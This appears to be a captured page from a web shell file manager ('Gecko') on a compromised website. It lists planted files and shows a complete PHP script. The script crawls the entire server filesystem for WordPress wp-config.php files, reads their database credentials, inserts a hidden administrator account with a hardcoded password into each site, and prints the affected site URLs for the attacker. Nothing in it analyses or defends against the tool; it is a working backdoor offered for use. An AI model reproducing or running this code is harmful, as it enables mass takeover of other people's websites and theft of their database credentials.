Gecko [ zonacarellc.com ]

Name	Size	Permission	Date
node-compile-cache	[ DIR ]	drwxr-xr-x	2025-04-10 14:01
.accept	53 B	-rw-r--r--	2026-06-03 08:07
.accepted	52 B	-rw-r--r--	2026-06-03 08:07
.cache	4.46 KB	-rw-r--r--	2026-06-03 08:20
.center	4.47 KB	-rw-r--r--	2026-06-03 08:07
.class	49 B	-rw-r--r--	2026-05-27 13:32
.classes	1.62 KB	-rw-r--r--	2026-06-11 04:41
.config	4.47 KB	-rw-r--r--	2026-05-27 02:47
.content	4.46 KB	-rw-r--r--	2026-05-27 03:32
.created	53 B	-rw-r--r--	2026-06-11 04:41
.db2_convert	1.54 KB	-rw-r--r--	2026-06-03 07:34
.dbx_convert	55 B	-rw-r--r--	2026-06-11 04:40
.flag	1.54 KB	-rw-r--r--	2026-06-04 06:39
.hld	1.54 KB	-rw-r--r--	2026-06-11 02:15
.ibase_pconnection	4.46 KB	-rw-r--r--	2026-05-27 03:32
.include	716 B	-rw-r--r--	2026-06-11 04:40
.lock	51 B	-rw-r--r--	2026-05-27 02:47
.locked	4.06 KB	-rw-r--r--	2026-06-11 04:41
.mb_convert	50 B	-rw-r--r--	2026-06-03 07:34
.multi	9.24 KB	-rw-r--r--	2026-06-11 04:40
.oauthexceptions	53 B	-rw-r--r--	2026-05-27 03:32
.ob_iconv_handle	55 B	-rw-r--r--	2026-06-11 04:40
.parle_tokens	9.24 KB	-rw-r--r--	2026-05-27 00:34
.partition	58 B	-rw-r--r--	2026-06-11 04:41
.post	9.24 KB	-rw-r--r--	2026-06-11 04:40
.rec	4.46 KB	-rw-r--r--	2026-06-03 08:20
.request	52 B	-rw-r--r--	2026-05-27 03:32
.reset	48 B	-rw-r--r--	2026-05-27 00:34
.rfind	4.47 KB	-rw-r--r--	2026-06-03 08:07
.rindex	43 B	-rw-r--r--	2026-05-29 12:11
.sw_fatal	5.36 KB	-rw-r--r--	2026-06-10 13:55
.sys	59 B	-rw-r--r--	2026-05-27 03:32
.system	52 B	-rw-r--r--	2026-05-26 14:08
.uconvert	56 B	-rw-r--r--	2026-06-03 08:20
____040scR	12.25 KB	-rw-------	2026-06-09 12:11
____KyhqhV	12.25 KB	-rw-------	2026-06-09 12:11
____PaMqqp	12.25 KB	-rw-------	2026-06-09 12:11
____SvOJC3	12.25 KB	-rw-------	2026-06-09 12:12
____TclfNp	12.25 KB	-rw-------	2026-06-09 12:11
____ceFyKA	12.25 KB	-rw-------	2026-06-09 12:11
____rAaMTe	12.25 KB	-rw-------	2026-06-09 12:11
____y3YxLh	12.25 KB	-rw-------	2026-06-09 12:12
phpC7rxWH	1008 B	-rw-------	2026-06-09 12:11
phpd2TiNG	1008 B	-rw-------	2026-06-09 12:11
phpoCL7VO	1008 B	-rw-------	2026-06-09 12:11
phpwYcIbM	20.79 KB	-rw-------	2026-05-14 09:18
run_6a2b284138ba8.php	124.4 KB	-rw-r--r--	2026-06-11 21:27
temp_0471009731df2c648b1ccd872b3bc9d9.temp	7.03 KB	-rw-r--r--	2026-05-14 09:22
temp_2aa5eb4ed9521cb0cfe6aa8b865c5dbc.temp	7.03 KB	-rw-r--r--	2026-05-13 07:37
temp_3bdd45bcc2b7a674255699bca1bd8ff6.temp	7.03 KB	-rw-r--r--	2026-05-14 09:16
temp_5a9ba034519673b292c46c82a9e2188c.temp	7.03 KB	-rw-r--r--	2026-05-14 09:01
temp_6283d410d006d15678aab41eec08a958.temp	7.03 KB	-rw-r--r--	2026-05-14 09:27
temp_7d8e04b7c2370e47d922650b3b9406ef.temp	7.03 KB	-rw-r--r--	2026-05-14 09:04
temp_87fc259dadfb0790140ed0acde54b3c0.temp	7.03 KB	-rw-r--r--	2026-05-14 08:34
temp_948a52f5b1ef4afd94cfe5f0e498ae11.temp	7.03 KB	-rw-r--r--	2026-05-15 09:10
temp_a961bfb8c66959fe28296ed60a84f9ea.temp	7.03 KB	-rw-r--r--	2026-05-14 09:25
wp_c_7665e28f.inc	258.19 KB	-rw-r--r--	2026-06-05 14:32

Rename

<?php   function scan($path) {     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) {             $p = $path . DIRECTORY_SEPARATOR . $file;             if ($file != '.' && $file != '..') {                 if (is_link($p)) {                     continue;                 } elseif (is_dir($p)) {                     scan($p);                 } elseif ($file === 'wp-config.php') {                     inject($p);                 }             }         }     } } function inject($p) {     $user_login = 'root';     $user_password = 'xh9QyDlNjW';     $user_email = 'admin@wordpress.com';     $data = @file_get_contents($p);     if ($data === false) {         return;     }     $pattern = "/table_prefix\s*=\s*'([^']*)';/i";     if (preg_match($pattern, $data, $matches)) {         $table_prefix = $matches[1];     } else {         $table_prefix = 'wp_';     }     $lines = array_map('rtrim', file($p));     $conf = [];     foreach ($lines as $line) {         if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) {             $conf[$matches[1]] = parse_define_value($line);         }     }     if (isset($conf['DB_HOST']) && isset($conf['DB_USER']) && isset($conf['DB_PASSWORD']) && isset($conf['DB_NAME'])) {         $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']);         if ($mysqli->connect_errno) {             return;         }         $user_login = $mysqli->real_escape_string($user_login);         $user_password = $mysqli->real_escape_string($user_password);         $user_email = $mysqli->real_escape_string($user_email);         if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) {             if ($result->num_rows > 0) {                 $result->close();                 $mysqli->close();                 return;             }             $result->close();         }         $add_user_query = "INSERT INTO `{$table_prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) SELECT '{$user_login}', MD5('{$user_password}'), '{$user_login}', '{$user_email}', '',         (SELECT `user_registered` FROM `{$table_prefix}users` ORDER BY `ID` ASC LIMIT 1),         0, '{$user_login}' FROM DUAL WHERE NOT EXISTS (     SELECT 1 FROM `{$table_prefix}users` WHERE `user_login` = '{$user_login}' );";         if ($mysqli->query($add_user_query)) {             $add_usermeta_query1 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)  SELECT `ID`, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;";             $add_usermeta_query2 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)  SELECT `ID`, 'wp_user_level', '10' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;";             $mysqli->query($add_usermeta_query1);             $mysqli->query($add_usermeta_query2);         }         $site_url = false;         if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) {             $row = $result->fetch_object();             $result->close();             $site_url = $row->option_value;         }         if (!$site_url || strpos($site_url, 'http') !== 0) {             if ($result = $mysqli->query("SELECT user_url FROM {$table_prefix}users ORDER BY ID ASC LIMIT 1;")) {                 $row = $result->fetch_object();                 $result->close();                 $site_url = $row->user_url;             }         }         if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) {             if ($result->num_rows > 0) {                 echo "<f>{$site_url}@@@{$p}</f>\n";             }             $result->close();         }         $mysqli->close();     } } function parse_define_value($line) {     if (preg_match("/define\s*$\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*$\s*;/", $line, $matches)) {         return $matches[1];     }     return null; } function scanRootPaths() {     if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {         foreach (range('A', 'Z') as $driveLetter) {             $drive = $driveLetter . ':\\';             if (is_dir($drive)) {                 scan($drive);             }         }     } else {         scan('/');     } } scanRootPaths(); die('!ended!');